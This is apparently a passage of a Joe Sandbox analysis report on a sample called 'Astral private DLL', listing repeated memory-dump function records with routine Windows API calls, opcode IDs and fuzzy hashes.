                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 758bc2757f3f14fcfe6b10a7cbb495097d70285ba9904d0ef1e1673209697817
                                                                • Instruction ID: 5bf385e5854e253eae7c257969a55d655542b8ebb8c15e782c1caa0e787b1487
                                                                • Opcode Fuzzy Hash: 758bc2757f3f14fcfe6b10a7cbb495097d70285ba9904d0ef1e1673209697817
                                                                • Instruction Fuzzy Hash: 7BA011E22A80023C3208A2022C02C3B02FCC0C8B20330C0AEF8A8A0080AE80080008B3
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 5261e9234d0be67fc0c3ed3ee433ab987df903062a8f6ffb0a57fff6aacd5aa5
                                                                • Instruction ID: 1ba834d1d33ea087f2438f6ab25e80e8f0dfc5b2469a9820d7017f6aeb440dd1
                                                                • Opcode Fuzzy Hash: 5261e9234d0be67fc0c3ed3ee433ab987df903062a8f6ffb0a57fff6aacd5aa5
                                                                • Instruction Fuzzy Hash: 5AA011E22A8002BC3208A2022C02C3B02FCC0C8B20330C8AEF8AA80080AA80080008B3
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 2828352552b3c9b8e0e62d49da57387ebd42d4dcb8779f9db9900880b9baaf04
                                                                • Instruction ID: 1ba834d1d33ea087f2438f6ab25e80e8f0dfc5b2469a9820d7017f6aeb440dd1
                                                                • Opcode Fuzzy Hash: 2828352552b3c9b8e0e62d49da57387ebd42d4dcb8779f9db9900880b9baaf04
                                                                • Instruction Fuzzy Hash: 5AA011E22A8002BC3208A2022C02C3B02FCC0C8B20330C8AEF8AA80080AA80080008B3
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 7f22fd8759e83e20d32f1bd2a47791a6269b55557d347c2711f9b0c3fdd54dc2
                                                                • Instruction ID: 1ba834d1d33ea087f2438f6ab25e80e8f0dfc5b2469a9820d7017f6aeb440dd1
                                                                • Opcode Fuzzy Hash: 7f22fd8759e83e20d32f1bd2a47791a6269b55557d347c2711f9b0c3fdd54dc2
                                                                • Instruction Fuzzy Hash: 5AA011E22A8002BC3208A2022C02C3B02FCC0C8B20330C8AEF8AA80080AA80080008B3
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 7ba1a97aa5524c0cf0e90bbd45e22af24a9d386499f64a37384c2c064d4c1d87
                                                                • Instruction ID: 1ba834d1d33ea087f2438f6ab25e80e8f0dfc5b2469a9820d7017f6aeb440dd1
                                                                • Opcode Fuzzy Hash: 7ba1a97aa5524c0cf0e90bbd45e22af24a9d386499f64a37384c2c064d4c1d87
                                                                • Instruction Fuzzy Hash: 5AA011E22A8002BC3208A2022C02C3B02FCC0C8B20330C8AEF8AA80080AA80080008B3
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E3FC
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: e740a62191fd34e50e91be4c384d635037263aefd96dfa19f185adf8c17ba8b7
                                                                • Instruction ID: 1ba834d1d33ea087f2438f6ab25e80e8f0dfc5b2469a9820d7017f6aeb440dd1
                                                                • Opcode Fuzzy Hash: e740a62191fd34e50e91be4c384d635037263aefd96dfa19f185adf8c17ba8b7
                                                                • Instruction Fuzzy Hash: 5AA011E22A8002BC3208A2022C02C3B02FCC0C8B20330C8AEF8AA80080AA80080008B3
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 8df21397c214d1394870dc8ba767e663e15498936e57ba61e9ff196f1c18de47
                                                                • Instruction ID: 73153cb15a47298873e1c858fabb155719fe77a2adb2db6128c1b332ecbe998e
                                                                • Opcode Fuzzy Hash: 8df21397c214d1394870dc8ba767e663e15498936e57ba61e9ff196f1c18de47
                                                                • Instruction Fuzzy Hash: 2FA011CA2A8002BC320822002E02C3B02FCC0CAF20330C8AEF82A80080AA800C0008B2
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 7bd72ccfab7a2a66e94f101e3f1d4c26fe1a2ab1a4826815a646af0f615e76c5
                                                                • Instruction ID: 73153cb15a47298873e1c858fabb155719fe77a2adb2db6128c1b332ecbe998e
                                                                • Opcode Fuzzy Hash: 7bd72ccfab7a2a66e94f101e3f1d4c26fe1a2ab1a4826815a646af0f615e76c5
                                                                • Instruction Fuzzy Hash: 2FA011CA2A8002BC320822002E02C3B02FCC0CAF20330C8AEF82A80080AA800C0008B2
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 850588080ef8ab50cca7936f285c4ca39cb530ec1a21b9fe4c7b925426f50b2b
                                                                • Instruction ID: 73153cb15a47298873e1c858fabb155719fe77a2adb2db6128c1b332ecbe998e
                                                                • Opcode Fuzzy Hash: 850588080ef8ab50cca7936f285c4ca39cb530ec1a21b9fe4c7b925426f50b2b
                                                                • Instruction Fuzzy Hash: 2FA011CA2A8002BC320822002E02C3B02FCC0CAF20330C8AEF82A80080AA800C0008B2
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E580
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: 54de4c53b6a6323dc04372ece62134897a67bb7699fe6c76cd568e9171fd5ed2
                                                                • Instruction ID: 91167bc387cc1abb9b4865a3c0861a89cdd4a9ec95f07a759dae6d2c28519c27
                                                                • Opcode Fuzzy Hash: 54de4c53b6a6323dc04372ece62134897a67bb7699fe6c76cd568e9171fd5ed2
                                                                • Instruction Fuzzy Hash: 47A011CA2E80003C320822A02C02C3B02FCC0E8B22332C2AEF82888080AA80080008B2
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E51F
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: e53a69c7b18dd4e7d2b33233fc058ccae407188a57e3e160cfbfc27f46756f4f
                                                                • Instruction ID: 73153cb15a47298873e1c858fabb155719fe77a2adb2db6128c1b332ecbe998e
                                                                • Opcode Fuzzy Hash: e53a69c7b18dd4e7d2b33233fc058ccae407188a57e3e160cfbfc27f46756f4f
                                                                • Instruction Fuzzy Hash: 2FA011CA2A8002BC320822002E02C3B02FCC0CAF20330C8AEF82A80080AA800C0008B2
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E580
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: a26021c20faa6395cde6af9aafdbd4fedfb7551a1cb586eb97463127a55b9fed
                                                                • Instruction ID: 19af208c2a684e12cafce2ed69d21663d439251a45ff9a91b2a1f9653b566902
                                                                • Opcode Fuzzy Hash: a26021c20faa6395cde6af9aafdbd4fedfb7551a1cb586eb97463127a55b9fed
                                                                • Instruction Fuzzy Hash: 95A011CA2A8002BC320822A02C02C3B02FCC0C8B20332C8AEF82A88080AA80080008B2
                                                                APIs
                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 0017E580
                                                                  • Part of subcall function 0017E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017E8D0
                                                                  • Part of subcall function 0017E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                • String ID:
                                                                • API String ID: 1269201914-0
                                                                • Opcode ID: ec27472db3713892bdd419bd67d6923aea65147a63dd7d3397cb29b24440bb49
                                                                • Instruction ID: 19af208c2a684e12cafce2ed69d21663d439251a45ff9a91b2a1f9653b566902
                                                                • Opcode Fuzzy Hash: ec27472db3713892bdd419bd67d6923aea65147a63dd7d3397cb29b24440bb49
                                                                • Instruction Fuzzy Hash: 95A011CA2A8002BC320822A02C02C3B02FCC0C8B20332C8AEF82A88080AA80080008B2
                                                                APIs
                                                                • SetEndOfFile.KERNELBASE(?,0016903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00169F0C
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: File
                                                                • String ID:
                                                                • API String ID: 749574446-0
                                                                • Opcode ID: de7a1496a4bf37f811b4f2b299c5b4a2ba0b58b114d4a6bde27a69d785ead7bf
                                                                • Instruction ID: ed0fabe071716ba51e95008cfbcc860e9f4954d1aff269f159e14524129ca93e
                                                                • Opcode Fuzzy Hash: de7a1496a4bf37f811b4f2b299c5b4a2ba0b58b114d4a6bde27a69d785ead7bf
                                                                • Instruction Fuzzy Hash: 07A0223008000E8BCE002B32CE0800C3B20FB22BC030802E8B00BCF8F2CB2388ABCB00
                                                                APIs
                                                                • SetCurrentDirectoryW.KERNELBASE(?,0017AE72,C:\Users\user\AppData\Local\Temp,00000000,001A946A,00000006), ref: 0017AC08
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory
                                                                • String ID:
                                                                • API String ID: 1611563598-0
                                                                • Opcode ID: d6f8e8d2da3ad2ae6672cbf6a9c38e8efdcf72d2a21ab48bbdb90c6e81925c82
                                                                • Instruction ID: 7ca539e231fbba815e9d3c8c0e1b3476141bedc3f555f1c765d6d3748e8ce2a0
                                                                • Opcode Fuzzy Hash: d6f8e8d2da3ad2ae6672cbf6a9c38e8efdcf72d2a21ab48bbdb90c6e81925c82
                                                                • Instruction Fuzzy Hash: 77A011302002008B82000B328F0AA0EBAAAAFA2B00F00C03AA00080030CB30C8A0AA00
                                                                APIs
                                                                • CloseHandle.KERNELBASE(000000FF,?,?,001695D6,?,?,?,?,?,00192641,000000FF), ref: 0016963B
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: b0469d04ae46f4324a2d2731b13dc6f818c6dcd462d22536c08433cb81682a1c
                                                                • Instruction ID: 4d28a55eb25dc83d83f9aa4f311b77ccaf2c6fcecc11ad194957e23dd24370da
                                                                • Opcode Fuzzy Hash: b0469d04ae46f4324a2d2731b13dc6f818c6dcd462d22536c08433cb81682a1c
                                                                • Instruction Fuzzy Hash: DFF0E230082B159FDB308B20CC48B92B7EDAB22335F044B1ED0F2429E0D370699D8A40
                                                                APIs
                                                                  • Part of subcall function 00161316: GetDlgItem.USER32(00000000,00003021), ref: 0016135A
                                                                  • Part of subcall function 00161316: SetWindowTextW.USER32(00000000,001935F4), ref: 00161370
                                                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0017C2B1
                                                                • EndDialog.USER32(?,00000006), ref: 0017C2C4
                                                                • GetDlgItem.USER32(?,0000006C), ref: 0017C2E0
                                                                • SetFocus.USER32(00000000), ref: 0017C2E7
